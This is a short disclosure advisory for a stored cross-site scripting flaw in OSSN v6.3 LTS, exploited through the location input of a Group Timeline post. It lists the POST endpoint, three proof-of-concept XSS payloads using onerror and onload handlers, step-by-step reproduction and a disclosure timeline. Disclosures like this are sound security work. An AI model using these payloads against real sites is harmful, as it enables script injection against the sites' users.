OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline
module.
The attacker must post something on the Group Timeline
and insert the XSS payload at the location input in order to exploit the stored XSS. The XSS payload will be launched immediately after submission.
-
http://ip_address:port/ossn/group/{number}
-
POST /ossn/action/wall/post/g?ossn_ts=1656419377&ossn_token=c0ee6b52f853a5073679f7a82372a0726a6a6e7d5500ec372fef9341f1e45e21
-
<img/	  src=~ onerror=prompt('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
-
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
-
<img src=x onerror=confirm('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
-
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
-
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
- Login with username and password. (If you don't have an account, you can register)
- Go to a "Groups". (If you don't have any groups, you can click on the "Add Group" button to create one.)
- Enter data in the data entry form.
- Click on the location button and enter the XSS payload.
- The XSS payload will run immediately.
Grim The Ripper Team by SOSECURE Thailand
- 2022–06–28: Vulnerability discovered.
- 2022–06–28: Vulnerability reported to the MITRE corporation.
- 2022–07–08: CVE has been reserved.
- 2022–07–08: Public disclosure of the vulnerability.
Reference: